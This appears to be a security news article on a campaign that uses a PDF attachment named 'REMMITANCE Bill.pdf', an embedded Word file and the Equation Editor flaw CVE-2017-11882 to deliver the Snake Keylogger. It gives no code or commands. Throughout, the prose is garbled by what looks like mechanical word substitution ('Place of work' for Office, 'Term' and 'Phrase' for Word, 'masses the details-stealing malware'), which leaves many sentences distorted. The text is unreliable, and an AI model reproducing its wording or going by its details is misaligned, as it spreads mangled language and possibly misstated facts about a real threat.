Snake Keylogger Spreads Through Malicious PDFs

Even though most malicious e-mail campaigns use Word documents to conceal and unfold malware, a lately discovered campaign uses a destructive PDF file and a 22-yr-aged Office environment bug to propagate the Snake Keylogger malware, scientists have observed.

The campaign—discovered by researchers at HP Wolf Security—aims to dupe victims with an hooked up PDF file purporting to have data about a remittance payment, in accordance to a blog site write-up revealed Friday. In its place, it masses the details-stealing malware, utilizing some difficult evasion tactics to prevent detection.

“While Place of work formats remain well-liked, this campaign displays how attackers are also employing weaponized PDF paperwork to infect methods,” HP Wolf Security researcher Patrick Schlapfer wrote in the put up, which opined in the headline that “PDF Malware Is Not Nevertheless Lifeless.”
Without a doubt, attackers utilizing destructive email campaigns have most popular to package deal malware in Microsoft Place of work file formats, particularly Term and Excel, for the earlier 10 years, Schlapfer stated. In the initial quarter of 2022 on your own, just about 50 percent (45 percent) of malware stopped by HP Wolf Security used Business office formats, according to scientists.

“The causes are clear: customers are common with these file styles, the purposes employed to open them are ubiquitous, and they are suited to social engineering lures,” he wrote.

However, though the new campaign does use PDF in the file lure, it afterwards employs Microsoft Term to produce the ultimate payload—the Snake Keylogger, scientists found. Snake Keylogger is a malware created working with .NET that initial appeared in late 2020 and is aimed at stealing sensitive information and facts from a victim’s device, like saved qualifications, the victim’s keystrokes, screenshots of the victim’s screen, and clipboard information, in accordance to Fortinet.

‘Unusual’ Marketing campaign

The HPW Wolf Security team discovered a new PDF-centered menace campaign on March 23 with an “unusual an infection chain,” involving not just a PDF but also “several tricks to evade detection, these types of as embedding destructive information, loading remotely-hosted exploits and shellcode encryption,” Schlapfer wrote.

Attackers focus on victims with email messages that include things like a PDF document named “REMMITANCE Bill.pdf”—misspelling intended–as attachment. If another person opens the file, Adobe Reader prompts the person to open a .docx file with a somewhat curious title, researchers uncovered.

“The attackers sneakily named the Phrase document “has been verified. On the other hand PDF, Jpeg, xlsx, .docx” to make it look as nevertheless the file identify was part of the Adobe Reader prompt,” in accordance to the write-up.

The.docx file is stored as an EmbeddedFile object inside of the PDF, which opens Microsoft Phrase if clicked on, scientists discovered. If Shielded Check out is disabled, Phrase downloads a Rich Textual content Structure (.rtf) file from a web server, which then is operate in the context of the open doc.

Researchers unzipped the contents of the .rtf—which is an Office Open XML file—finding a URL hidden in the “document.xml.rels” file that is not a genuine area discovered in Office documents, they reported.

17-Year-Outdated Bug Exploited

Connecting to this URL qualified prospects to a redirect and then downloads an RTF doc termed “f_doc_shp.doc. This document contained two “not nicely-formed” OLE objects that exposed shellcode exploiting  CVE-2017-11882, which scientists reported is an “over 4-years-old” remote code execution vulnerability (RCE) in Equation Editor.

Equation Editor is application installed by default with the Business office suite that’s applied to insert and edit complicated equations as Object Linking and Embedding (OLE) merchandise in Microsoft Phrase files.

It turns out, having said that, that the bug that attackers leverage in the campaign is in fact a single that Microsoft patched extra than four many years ago–in 2017, to be exact—but truly had existed some 17 years ahead of that, producing it 22 decades aged now.

As the final act of the attack, scientists identified shellcode saved in the “OLENativeStream” framework at the end of a person of the OLE objects they examined. The code inevitably decrypts a ciphertext that turns out to be much more shellcode, which is then executed just after to guide to an executable identified as fresh.exe that hundreds the Snake Keylogger, scientists observed.